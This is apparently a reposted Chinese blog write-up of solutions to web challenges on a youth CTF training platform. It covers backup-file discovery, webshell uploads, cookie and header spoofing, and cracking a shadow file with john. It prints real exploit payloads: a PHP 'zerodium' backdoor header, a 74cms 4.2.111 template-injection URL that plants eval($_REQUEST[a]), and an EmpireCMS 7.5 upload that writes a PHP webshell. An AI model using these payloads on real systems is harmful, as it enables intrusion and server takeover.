当前位置: 首页 > article >正文

青少年CTF训练平台-WEB-部分wp

这两天因为别人问了下题目.打开后,闲着没事,去做了两道题目。顺便发出来wp.

Web签到

扫描发现备份文件
在这里插入图片描述

打开发现flag

在这里插入图片描述

easyupload

直接上传,然后获取flag

在这里插入图片描述

木马地址,通过扫描目录发现。

在这里插入图片描述在这里插入图片描述

PHP的后门

直接添加请求头

user-agentt: zerodiumsystem(‘cat /flag’);

在这里插入图片描述

q1jun的小秘密

连接之后,查找具有suid权限的命令

在这里插入图片描述

根据提示直接发现flag
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提示说明没有中文

在这里插入图片描述

但是仍然错误,查看shadow,通过john破解密码

在这里插入图片描述
在这里插入图片描述

用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理

指定format参数

john --format=crypt shadow

最后得到flag qsnctf{ikun_Do_Y0u_p1ay_b4sketba11}

新手的登录

使用提示的user账号登录之后

在这里插入图片描述

抓包修改cookie为admin。发包,得到flag

在这里插入图片描述

吃豆人

访问之后直接查看js文件,

发现base64编码,解码之后发现flag

在这里插入图片描述
在这里插入图片描述

F14G

抓包经过测试

验证请求头为: CF-Connecting-IP 参数为IP

在这里插入图片描述

这个规则比较重要.
在这里插入图片描述

所以我们直接发包即可

从0-255

在这里插入图片描述

然后提取flag

在这里插入图片描述

骑士CMS01

提示弱口令.访问后台

随便输入得到账号密码 为admin/admin

查看版本发现是 74cms v 4.2.111

找到对应版本的POC

在这里插入图片描述

利用漏洞getshell

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'
shell地址: /Application/Home/Conf/config.php

在这里插入图片描述

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',eval($_REQUEST[a]),'$_REQUEST[a]

获取flag

在这里插入图片描述

POST&GET

在这里插入图片描述

ezupload

审计代码,发现黑名单中没有 php 后缀.

没有其他校验方式.直接上传即可。

<?php
    @error_reporting(0);
    date_default_timezone_set('America/Los_Angeles');
    highlight_file(__FILE__);
    if (isset($_POST['submit'])){
        $file_name = trim($_FILES['upload_file']['name']);
        $black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);

        if (!in_array($file_ext, $black)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;

            if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        }else {
            $msg = '你传啥玩意??';
        }
    }
    if($is_upload){
        echo '呀,(传)进去了欸~';
    }
?>

在这里插入图片描述

这是文件的路径.

$img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext; 

可以爆破出来,关键在于 date的时区在上面已经定义。

date_default_timezone_set('America/Los_Angeles');

为了尽可能的减少请求的次数,

在本地同步模拟发包时间,减小范围

在这里插入图片描述

这是载荷

在这里插入图片描述

在这里插入图片描述

获取flag

在这里插入图片描述

帝国CMS01

扫描目录发现备份文件

在这里插入图片描述

本来以为在里面发现sql文件需要登录后台。

不过在后台目录下面发现shell文件/

在这里插入图片描述

直接访问

获取flag

在这里插入图片描述

帝国CMS02

扫描目录发现备份文件已经删除了。

尝试弱口令,

admin / 123465789 登录成功。

在首页发现flag

在这里插入图片描述

帝国CMS03

尝试弱口令,

admin / 123465789 登录成功。

尝试利用 7.5版本的 后台命令执行漏洞
在这里插入图片描述

创建名为shell.php.mod的文件在本地,内容如下

注意转义,否则会失败

<?php file_put_contents("shell.php","<?php eval(\$_REQUEST[swback]); ?>"); ?>

在如下位置上传

在这里插入图片描述

在这里插入图片描述

获取flag

在这里插入图片描述


http://www.kler.cn/a/8091.html

相关文章:

  • 【Linux】进程间通信 -> 匿名管道命名管道
  • 数据结构之线性表之顺序表
  • IIC驱动EEPROM
  • LeetCode 热题 100_LRU 缓存(35_146_中等_C++)(哈希表 + 双向链表)(构造函数声明+初始化列表=进行变量初始化和赋值)
  • Springboot + vue3 实现大文件上传方案:秒传、断点续传、分片上传、前端异步上传
  • 精准提升:从94.5%到99.4%——目标检测调优全纪录
  • vue给input框属性赋值的方法
  • Android系统重要组件AMS
  • 【Spring】4—声明式事务
  • 【Mysql系列】——详细剖析数据库中的存储引擎
  • Java面向对象三剑客之——继承
  • Burp Suite的使用(常用模块)
  • python基础-元组
  • 【gRPC】第1篇 全面讲解RPC原理(必收藏)
  • egg编写用户点赞的接口
  • 思维导图手撕MyBatis源码
  • Spring中的循环依赖是什么?如何解决它?
  • HTB-Passage
  • Kafka源码分析之Producer数据发送流程(四)
  • SpringBoot项目中web静态资源的一些问题
  • 【C#】NLS_Speed使用说明
  • ToBeWritten之杂项2
  • C-NCAP 2025主动安全ADAS测试研究
  • 面了 6 家大厂,并拿下 5 家 offer,进大厂好像也没有那么困难吧....
  • 【SQL 必知必会】- 第十一课 使用子查询
  • mocha如何实现异步测试